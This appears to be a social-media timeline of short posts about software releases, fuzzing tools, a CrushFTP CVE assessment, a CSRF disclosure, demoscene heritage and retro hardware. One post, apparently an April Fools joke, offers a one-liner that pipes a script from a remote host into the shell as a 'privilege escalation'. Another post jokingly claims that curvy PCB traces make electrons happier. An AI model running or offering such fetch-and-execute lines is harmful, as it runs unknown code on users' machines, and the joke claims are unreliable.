Sourcetrail 2025.4.1 released:

https://github.com/petermost/Sourcetrail/releases/tag/2025.4.1

Periodic reminder that the rr-project (time-traveling gdb) is alive and kicking:

https://rr-project.org/

Vibe Wizards will never understand.

I read a report recently that confirmed that straight PCB traces, right angle, and orthogonally placed components can actually make electrons sad and slow them down. They much prefer the excitement of whizzing along curvy traces, particularly if they end up going in to a chip at a random angle. And bright colours really make them want to work harder.

So I will be updating all #RC2014 kits with design philosophy. The first to be done is the RC2014 Mini II Picasso. You can pick one up now at #z80kits
https://z80kits.com/shop/rc2014-mini-ii-picasso/

@algernon Damn you make it harder to resist installing this thing every day!

I was foolish enough to link to a Twitter thread in an old slide deck. It's not on IA.

Are there any alternatives where I can look up the tweet?

#bitrot #digitalpreservation #archiving

@thc :)

💥CVE-20250401 - 7350pipe - Linux Privilege Escalation (all versions). Exploit (1-liner):

“. <(curl -SsfL https://thc.org/7350pipe)”

https://lore.kernel.org/linux-cve-announce/2025032721-CVE-2023-53032-70ce@gregkh/T/#u "Note that it's harmless since the value will be checked at the next step." Sure, but our Bash script has determined this will get a CVE anyway: https://web.git.kernel.org/pub/scm/linux/kernel/git/lee/vulns.git/tree/scripts/cve_review#n192

New assessment for topic: CVE-2025-2825

Topic description: "CrushFTP versions 10.0.0 through 10.8.3 and 11.0.0 through 11.3.0 are affected by a vulnerability that may result in unauthenticated access ..."

"[CVE-2025-2825](https://nvd.nist.gov/vuln/detail/CVE-2025-2825) is a critical vulnerability affecting CrushFTP 11 below 11.3.1 and 10 below 10.8.4 ..."

Link: https://attackerkb.com/assessments/4c81cb24-aafd-4753-92bb-33c1190c24a5

Shots fired.

The demoscene has become a national UNESCO heritage in Sweden! I was part of making the application, so ofc I think it's great, but I wrote a little bit about how difficult it is to generalize the demoscene. https://www.goto80.com/the-demoscene-as-a-unesco-heritage-in-sweden

@algernon As for generating SVG's, a fuzzer may be useful: https://komar.in/en/code/xmlfuzzer (haven't used this one, but the description fits)

The Pentium processor, like many others, implements its instructions in microcode. Each step of an instruction is described by a micro-instruction, stored in the chip in the microcode ROM.
This die photo shows the parts of the Pentium. Let's take a quick look at the microcode ROM...1/N

A prominent computer scientist who has spent 20 years publishing academic papers on cryptography, privacy, and cybersecurity has gone incommunicado, had his professor profile, email account, and phone number removed by his employer Indiana University, and had his homes raided by the FBI. No one knows why.

#XiaofengWang Xiaofeng Wang

https://arstechnica.com/security/2025/03/computer-scientist-goes-silent-after-fbi-raid-and-purging-from-university-website/

Sufficient time has passed and I'm excited to share a demo and details of a CSRF vulnerability that I discovered in the popular gorilla/csrf library that has been present since its creation 😲 https://patrickod.com/csrf

🚨 LibAFL 0.15.2 🚨

• Rust 2024 edition
• LibAFL_Unicorn
• Use LibAFL rand types for other crates
• Allow logging to StatsD
• LibAFL_QEMU updates like binary-only ASan in Rust 🦀🦀🦀, inputs via StdIn, better snapshots

And so much more:

https://github.com/AFLplusplus/LibAFL/releases/tag/0.15.2

#LibAFL #Fuzzing #AFLplusplus

HexShare - Share binaries with byte highlighting

https://hex.pov.sh/

@kagihq 403...